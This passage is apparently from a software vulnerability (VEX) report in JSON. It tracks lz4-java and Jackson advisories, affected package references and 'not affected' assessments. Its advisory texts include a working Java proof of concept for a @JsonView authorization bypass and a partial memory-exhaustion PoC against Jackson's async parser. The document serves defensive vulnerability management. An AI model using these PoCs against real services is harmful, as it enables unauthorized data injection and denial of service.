          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#dbee5ff7-f091-4f9f-a244-f0fc96ad4c03"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#e752ec06-9a0c-4b21-ab43-417da928c6cf"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#be7de3d3-15cd-4e75-a8d2-0b1fb6379f51"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e4128cc9-eff7-44a3-9d2c-28b1dfd7f8b2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#da9d90d8-4f83-439b-939a-4a6405ba0813"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#ffcbfbb0-e189-4cae-8b77-240147c45069"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ea4a475d-7b42-4b65-9d76-44cc5ff33192"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f7e481bb-7d36-42c7-85e2-3c06a3786f2c"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#e43ff7fe-9523-4928-af5d-3dd2e82f0031"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#9dc1c36c-49a5-4d1c-bdd3-be2f7d9426ef"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#e59f9146-a8e6-48a7-8afa-0d114ecfab19"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#e2bab1c2-1928-4a58-a9e9-58661f512bf3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59949",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "yawkat LZ4 Java provides LZ4 compression for Java. Prior to 1.11.1, JNI-backed XXHash implementations fail to validate the byte array object and the off and len arguments in XXHashFactory.nativeInstance().hash32().hash(), XXHashFactory.nativeInstance().hash64().hash(), XXHashFactory.nativeInstance().newStreamingHash32().update(), and XXHashFactory.nativeInstance().newStreamingHash64().update(), allowing null arrays or oversized ranges to reach native code, read outside the Java array, and fatally terminate the JVM. This issue is fixed in version 1.11.1.",
      "recommendation": "Upgrade at.yawk.lz4:lz4-java to version 1.11.1",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59949"
        },
        {
          "url": "https://github.com/yawkat/lz4-java"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/commit/dbd86d04b8dd716e1c2bc626be54189997d910da"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/releases/tag/v1.11.1"
        },
        {
          "url": "https://github.com/yawkat/lz4-java/security/advisories/GHSA-xx22-p4ch-683r"
        }
      ],
      "published": "2026-08-18T15:16:56+00:00",
      "updated": "2026-08-18T18:18:49+00:00",
      "affects": [
        {
          "ref": "pkg:maven/at.yawk.lz4/lz4-java@1.10.2",
          "versions": [
            {
              "version": "1.10.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/at.yawk.lz4/lz4-java@1.10.1",
          "versions": [
            {
              "version": "1.10.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.1"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#4b8204b8-97fd-439c-925b-e57acb5d55df"
        },
        {
          "ref": "urn:cdx:1c2d07e7-bc46-4c64-85c9-cf1f4b389599/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.1"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.1"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.1"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#d5ab9fd1-37b3-46b7-8697-1e32f4471eb4"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:152fa677-6ce3-4031-92f7-bff2f6dc3831/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.1"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.1"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.1"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#6a0d62b1-dd0d-404b-bc64-78d64cde37b9"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#ea5135d5-07b3-48a0-a682-ba34017270db"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#fe237ebc-aa3f-4b6e-a901-6afe4738e170"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f9de8377-b9bb-4b33-854a-45486a16a5bf"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#b9c7f6cd-a10a-4f78-8197-02f975da4346"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#f729ea78-34ad-4279-94d2-d3cdd35dae56"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#5aa0fb51-fe34-40a2-af76-865a1b387425"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#f2ca560b-5a88-4fb7-b5b6-3b7cbadf7b3c"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#ed846069-3d07-4aeb-a651-4ba91c6748b7"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#e61ea988-1f08-487b-b4e5-184a16898c11"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#f74a468e-318b-48b0-b371-d0f25bce3ab4"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ed8ccc31-ba8e-474c-bf15-8e6281fa1acf"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#f74382b9-1b1a-4a75-9c8e-7c1867c90ef8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#ea065bc9-b876-459b-85b6-29be18af335b"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fa3a98c7-3422-4aa0-832f-5c88db0fc3c0"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#fdbfdfef-6321-44b4-a66d-3744000337a7"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#df46777b-9456-412b-b215-37c65044e5d0"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#9d701506-e473-4f67-889c-4b2a7615e9c3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.1"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#e09dcecb-1833-4157-b257-e732c5e15e50"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/at.yawk.lz4/lz4-java@1.10.1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. Kafka's own bundled LZ4 codec, which every CP repo relies on transitively for record-batch compression, only ever calls the always-safe one-shot XXHash hash() API with non-null, internally-bounded buffers; the vulnerable streaming update() API is never called anywhere in the CP repo set."
      }
    },
    {
      "id": "GHSA-mhm7-754m-9p8w",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "description": "## Summary\n\nIn `BeanDeserializer.deserializeUsingPropertyBasedWithExternalTypeId`, the active-view (`@JsonView`) filter was applied only to the regular bean-property branch; the creator-property branch performed no `creatorProp.visibleInView(activeView)` check. A constructor parameter annotated with both `@JsonView(RestrictedView.class)` and `@JsonTypeInfo(use=Id.NAME,\n  include=As.EXTERNAL_PROPERTY)` is populated from attacker JSON even when a more restrictive view is active.\n\n  This is a patch gap. GHSA-5hh8 (CVE-2026-54517) and GHSA-rcqc (CVE-2026-54518) descriptions cover only the main property-based path and the unwrapped-creator path respectively; the external-type-id creator path was fixed on the 3.x line via #6004 (\"Extend #5969/#5971 fixes to ... external-type-id case in regular BeanDeserializer\", commit 7dc7a17, 2026-05-22) but\n  **the fix was never backported to 2.21 or 2.18**. Users on 2.21.4 and 2.18.8 who upgraded per the published advisories remain vulnerable to the same `@JsonView` bypass technique via a different code path.\n\n## Vulnerable Code Path\n\nFile: `com/fasterxml/jackson/databind/deser/BeanDeserializer.java`\nMethod: `deserializeUsingPropertyBasedWithExternalTypeId`\n\nOn 2.21.4 (and 2.18.8), the creator-property branch (around line 1125-1158) checks `creatorProp.isInjectionOnly()` and hands off to `ext.handlePropertyValue(...)` / `buffer.assignParameter(...)` without ever consulting `visibleInView(activeView)`:\n\n ```java\n  if (creatorProp != null) {\n      // [databind#1381]: if useInput=FALSE, skip deserialization from input\n      if (creatorProp.isInjectionOnly()) { ... }\n      // NO visibleInView(activeView) CHECK HERE\n      if (!ext.handlePropertyValue(p, ctxt, propName, null)) {\n          if (buffer.assignParameter(creatorProp, ...)) { ... }\n      }\n      continue;\n  }\n```\n\nOn 3.1.4, the same branch contains the additional guard (commit 7dc7a17):\n\n ```java\n   if (creatorProp != null) {\n      // [databind#5971]: must honor active view here too\n      if ((activeView != null) && !creatorProp.visibleInView(activeView)) {\n          p.skipChildren();\n          continue;\n      }\n      ...\n  }\n```\n\nThe 2.21 and 2.18 backport PRs (#6005 and #6003) only backported the main-path fixes from #5969/#5971; the external-type-id fix from #6004 was not backported. The maintainer closed #6005\n  with \"got changes merged forward, looks like it's all covered now\", but the forward-merge did not include the ExtTypeId creator branch.\n\n  Proof of Concept\n\n  Compiles and runs against jackson-databind 2.21.4:\n \n```java\n  import com.fasterxml.jackson.annotation.*;\n  import com.fasterxml.jackson.databind.ObjectMapper;\n\n  public class JsonViewExternalTypeIdBypass {\n      public static class PublicView {}\n      public static class AdminView extends PublicView {}\n\n      public static abstract class Asset { public String name; }\n      public static class PublicAsset extends Asset {}\n      public static class AdminAsset extends Asset { public String secret; }\n\n      public static class Container {\n          @JsonTypeInfo(use = JsonTypeInfo.Id.NAME,\n                  include = JsonTypeInfo.As.EXTERNAL_PROPERTY,\n                  property = \"kind\")\n          @JsonSubTypes({\n              @JsonSubTypes.Type(value = PublicAsset.class, name = \"pub\"),\n              @JsonSubTypes.Type(value = AdminAsset.class,  name = \"admin\")\n          })\n          @JsonView(AdminView.class)\n          public Asset asset;\n\n          public String label;\n\n          @JsonCreator\n          public Container(\n                  @JsonProperty(\"label\") String label,\n                  @JsonProperty(\"asset\") @JsonView(AdminView.class) Asset asset) {\n              this.label = label;\n              this.asset = asset;\n          }\n      }\n\n      public static class Wrapper {\n          @JsonView(PublicView.class)\n          public Container data;\n      }\n\n      public static void main(String[] args) throws Exception {\n          // Admin-only \"asset\" should be blocked when reading with PublicView\n          String json = \"{\\\"data\\\":{\\\"label\\\":\\\"hello\\\",\\\"kind\\\":\\\"admin\\\",\"\n                      + \"\\\"asset\\\":{\\\"name\\\":\\\"foo\\\",\\\"secret\\\":\\\"LEAKED\\\"}}}\";\n\n          ObjectMapper om = new ObjectMapper();\n          Wrapper r = om.readerWithView(PublicView.class)\n                  .forType(Wrapper.class)\n                  .readValue(json);\n\n          System.out.println(r.data);\n          // Actual on 2.21.4:   Container{label='hello', asset=AdminAsset{name='foo', secret='LEAKED'}}\n          // Expected (secure):  Container{label='hello', asset=null}\n          if (r.data.asset != null && r.data.asset instanceof AdminAsset) {\n              System.out.println(\"[!!] BYPASS CONFIRMED \u2014 admin-only asset populated under PublicView\");\n          }\n      }\n  }\n```\n\nA control case that removes include = As.EXTERNAL_PROPERTY (forcing the normal property-based path) correctly returns asset = null, confirming the bypass is specific to the ExternalTypeId\n  code path and not a misconfiguration.\n\n### Impact\n\n  View-restricted (e.g. admin-only) creator properties can be populated from untrusted input where @JsonView is used as a write-side authorization boundary. Typical victims are Spring Boot\n  REST controllers that use @JsonView(PublicView.class) on the request body to whitelist user-settable fields \u2014 an attacker can inject the restricted creator parameter (including choosing\n  the polymorphic subtype via the sibling kind/type-id property) by combining it with a polymorphic @JsonTypeInfo(EXTERNAL_PROPERTY) annotation on the same field.\n\n- CWE-863 (Incorrect Authorization)\n- Same impact class as CVE-2026-54517 / CVE-2026-54518\n- No RCE, no DoS \u2014 this is an access-control / mass-assignment bypass\n\n### Trigger Conditions\n\nDeveloper code must combine (no opt-in user configuration required):\n\n1. Property-based @JsonCreator on the outer type\n2. A creator parameter annotated with @JsonView(RestrictedView.class)\n3. The same parameter annotated with @JsonTypeInfo(use=Id.NAME, include=As.EXTERNAL_PROPERTY, property=\"...\")",
      "recommendation": "Upgrade com.fasterxml.jackson.core:jackson-databind to version 2.18.9, 2.21.5",
      "advisories": [
        {
          "url": "https://github.com/advisories/GHSA-mhm7-754m-9p8w"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/c628b357ed143d8492756d5c1458cfb9fbeb29ed"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/commit/dea7eb466e98cc226c4ac65587581fb49926820c"
        },
        {
          "url": "https://github.com/FasterXML/jackson-databind/security/advisories/GHSA-mhm7-754m-9p8w"
        }
      ],
      "published": "2026-07-21T19:40:12+00:00",
      "updated": "2026-07-21T19:40:12+00:00",
      "affects": [
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6",
          "versions": [
            {
              "version": "2.18.6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8",
          "versions": [
            {
              "version": "2.18.8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:9b068e1a-8bb7-460d-a898-b38a7bd09e06/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:7f5b0f1f-2f04-4da8-a834-ed0e9a127639/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e02dd261-cd8f-4913-980a-9e4efbca1fa6/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#e16a39cc-16c4-44be-811a-60815861e85c"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ce29a600-32f9-4ae4-989e-52d9c75f55d4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#79024452-416e-4987-b86c-9d9cd4c10910"
        },
        {
          "ref": "urn:cdx:82acba58-7e67-475b-bbb0-774b260bff77/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cee8583a-1057-4ccd-baa1-21e9669a2ffa"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#806bad17-7a38-452a-a9a3-5e61cfa3d662"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.6"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#dbee5ff7-f091-4f9f-a244-f0fc96ad4c03"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#e752ec06-9a0c-4b21-ab43-417da928c6cf"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#be7de3d3-15cd-4e75-a8d2-0b1fb6379f51"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e4128cc9-eff7-44a3-9d2c-28b1dfd7f8b2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#da9d90d8-4f83-439b-939a-4a6405ba0813"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#ffcbfbb0-e189-4cae-8b77-240147c45069"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#ea4a475d-7b42-4b65-9d76-44cc5ff33192"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f7e481bb-7d36-42c7-85e2-3c06a3786f2c"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#e43ff7fe-9523-4928-af5d-3dd2e82f0031"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#9dc1c36c-49a5-4d1c-bdd3-be2f7d9426ef"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.18.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#e59f9146-a8e6-48a7-8afa-0d114ecfab19"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#e2bab1c2-1928-4a58-a9e9-58661f512bf3"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "GHSA-r7wm-3cxj-wff9",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [],
      "description": "## Summary\n\nThe fix released in jackson-core `2.18.6` and `2.21.1` for [GHSA-72hv-8253-57qq](https://github.com/FasterXML/jackson-core/security/advisories/GHSA-72hv-8253-57qq) (Number Length Constraint Bypass in Async Parser, published 2026-02-28) is incomplete. The fix commit `b0c428e6` (#1555) wired `validateIntegerLength` into a new `_setIntLength` helper and called it at every place where the integer portion of a number is *decided* (terminator byte arrived, `.` / `e/E` seen, end-of-feed inside a fully-buffered value). It did not call it on the much more attacker-relevant path: \"ran out of input while still inside `MINOR_NUMBER_INTEGER_DIGITS`, return `NOT_AVAILABLE` to caller\".\n\nAs a result, an attacker who streams JSON to a non-blocking parser in many small chunks, without ever sending a terminator byte, can keep the parser inside `MINOR_NUMBER_INTEGER_DIGITS` indefinitely. `_textBuffer.expandCurrentSegment()` grows on every chunk, and `validateIntegerLength` is never invoked. The accumulator is only gated by `maxStringLength` (20 MiB default) \u2014 a **~20,000x amplification** of the documented `maxNumberLength` (1000 default).\n\nThis is the same vulnerability class, same advisory wording (\"Memory Exhaustion: Unbounded allocation in TextBuffer from excessively long numbers\"), same parser class \u2014 just the streaming path the original fix didn't cover. The fix to the *fraction* path is correct (see `_finishFloatFraction` at line 1834-1837 of `NonBlockingUtf8JsonParserBase.java` in 2.18.6, where `_setFractLength(fractLen)` IS called before the `NOT_AVAILABLE` return); the equivalent call is missing from every integer-digit path.\n\n## Affected versions\n\nVerified on the patched releases:\n- `com.fasterxml.jackson.core:jackson-core` **2.18.6**\n- `com.fasterxml.jackson.core:jackson-core` **2.21.1**\n\nStructurally identical code in `tools.jackson.core` 3.0.x / 3.1.x \u2014 same `NonBlockingUtf8JsonParserBase` class, same `_setIntLength` rollout, same NOT_AVAILABLE returns without validation. Not retested but presumed vulnerable.\n\n## Affected code\n\n[`src/main/java/com/fasterxml/jackson/core/json/async/NonBlockingUtf8JsonParserBase.java`](https://github.com/FasterXML/jackson-core/blob/b0c428e6/src/main/java/com/fasterxml/jackson/core/json/async/NonBlockingUtf8JsonParserBase.java) in 2.18.6 / 2.21.1.\n\n### Site 1 \u2014 `_startPositiveNumber(int ch)` lines 1320-1330:\n\n```java\nif (outPtr >= outBuf.length) {\n    // NOTE: must expand to ensure contents all in a single buffer (to keep\n    // other parts of parsing simpler)\n    outBuf = _textBuffer.expandCurrentSegment();\n}\noutBuf[outPtr++] = (char) ch;\nif (++_inputPtr >= _inputEnd) {\n    _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n    _textBuffer.setCurrentLength(outPtr);\n    return _updateTokenToNA();          // <-- no validateIntegerLength(outPtr)\n}\n```\n\n### Site 2 \u2014 `_finishNumberIntegralPart` lines 1691-1727:\n\n```java\nprotected JsonToken _finishNumberIntegralPart(char[] outBuf, int outPtr) throws IOException {\n    int negMod = _numberNegative ? -1 : 0;\n\n    while (true) {\n        if (_inputPtr >= _inputEnd) {\n            _minorState = MINOR_NUMBER_INTEGER_DIGITS;\n            _textBuffer.setCurrentLength(outPtr);\n            return _updateTokenToNA();    // <-- no validateIntegerLength(outPtr + negMod)\n        }\n        int ch = getByteFromBuffer(_inputPtr) & 0xFF;\n        if (ch < INT_0) {\n            if (ch == INT_PERIOD) {\n                _setIntLength(outPtr+negMod);   // <-- validated here\n                ++_inputPtr;\n                return _startFloat(outBuf, outPtr, ch);\n            }\n            break;\n        }\n        if (ch > INT_9) {\n            if ((ch | 0x20) == INT_e) {\n                _setIntLength(outPtr+negMod);   // <-- validated here\n                ++_inputPtr;\n                return _startFloat(outBuf, outPtr, ch);\n            }\n            break;\n        }\n        ++_inputPtr;\n        if (outPtr >= outBuf.length) {\n            outBuf = _textBuffer.expandCurrentSegment();\n        }\n        outBuf[outPtr++] = (char) ch;\n    }\n    _setIntLength(outPtr+negMod);            // <-- validated here\n    _textBuffer.setCurrentLength(outPtr);\n    return _valueComplete(JsonToken.VALUE_NUMBER_INT);\n}\n```\n\nThe pattern recurs at lines 1297, 1329, 1343, 1365, 1395, 1409, 1437, 1467, 1481, 1586, 1644, 1698 \u2014 every \"ran out of input mid-integer\" exit returns to the caller without validating the accumulator length.\n\n### Compare with the fraction path that is correct\n\n`_finishFloatFraction` lines 1827-1838:\n\n```java\nwhile (loop) {\n    if (ch >= INT_0 && ch <= INT_9) {\n        ++fractLen;\n        if (outPtr >= outBuf.length) {\n            outBuf = _textBuffer.expandCurrentSegment();\n        }\n        outBuf[outPtr++] = (char) ch;\n        if (_inputPtr >= _inputEnd) {\n            _textBuffer.setCurrentLength(outPtr);\n            _setFractLength(fractLen);          // <-- VALIDATED\n            return JsonToken.NOT_AVAILABLE;\n        }\n        ch = getNextSignedByteFromBuffer();\n    }\n    ...\n}\n```\n\n## Impact\n\nReactive frameworks (Spring WebFlux / Reactor, Quarkus, Helidon, Vert.x JSON, anything wrapping `JsonFactory.createNonBlockingByteArrayParser()` or `createNonBlockingByteBufferParser()`) feed inbound HTTP/gRPC bytes to the async parser as they arrive. Operators who set `StreamReadConstraints.builder().maxNumberLength(N)` on the assumption that this caps memory per number value are not getting that guarantee in chunked-feed scenarios. The parser silently accumulates digits up to `maxStringLength` (20 MiB default) per concurrent connection. Multiply by attacker-controlled concurrency to OOM the JVM.\n\nThe synchronous parsers (`UTF8StreamJsonParser`, `ReaderBasedJsonParser`) and the async parser on *complete* input are not affected \u2014 those paths go through `_setIntLength` or `ParserBase._reportTooLongIntegral` correctly.\n\nCWE-770 (Allocation of Resources Without Limits or Throttling), CVSS roughly the same as the parent advisory (Network / Low complexity / High availability impact). The parent advisory was scored CVSS 8.7 High.\n\n## Proof of concept\n\nStandalone PoC, no Maven required:\n\n```\nmkdir poc && cd poc\ncurl -sLo jackson-core-2.18.6.jar https://repo1.maven.org/maven2/com/fasterxml/jackson/core/jackson-core/2.18.6/jackson-core-2.18.6.jar\ncat > PoC.java <<'EOF'\nimport com.fasterxml.jackson.core.*;\nimport com.fasterxml.jackson.core.async.ByteArrayFeeder;\n\npublic class PoC {\n    public static void main(String[] args) throws Exception {\n        StreamReadConstraints strict = StreamReadConstraints.builder()\n                .maxNumberLength(1000)\n                .build();\n        JsonFactory f = new JsonFactoryBuilder()\n                .streamReadConstraints(strict)\n                .build();\n\n        // Sanity: synchronous parser rejects 5000-digit int.\n        try (JsonParser p = f.createParser(\"{\\\"v\\\":\" + \"1\".repeat(5000) + \"}\")) {\n            while (p.nextToken() != null) { /* drive */ }\n            System.out.println(\"[-] BUG ABSENT: sync parser accepted\");\n            return;\n        } catch (Exception e) {\n            System.out.println(\"[+] sync parser rejected 5000-digit int: \" + e.getClass().getSimpleName());\n        }\n\n        // Bug: async parser, chunked, no terminator.\n        JsonParser ap = f.createNonBlockingByteArrayParser();\n        ByteArrayFeeder feeder = (ByteArrayFeeder) ap;\n\n        byte[] preamble = \"{\\\"v\\\":\".getBytes(\"UTF-8\");\n        feeder.feedInput(preamble, 0, preamble.length);\n        while (ap.nextToken() != JsonToken.NOT_AVAILABLE) { /* drain */ }\n\n        byte[] digits = new byte[16 * 1024];\n        for (int i = 0; i < digits.length; i++) digits[i] = (byte) ('1' + (i % 9));\n\n        for (int c = 0; c < 600; c++) {\n            feeder.feedInput(digits, 0, digits.length);\n            JsonToken t = ap.nextToken();\n            if 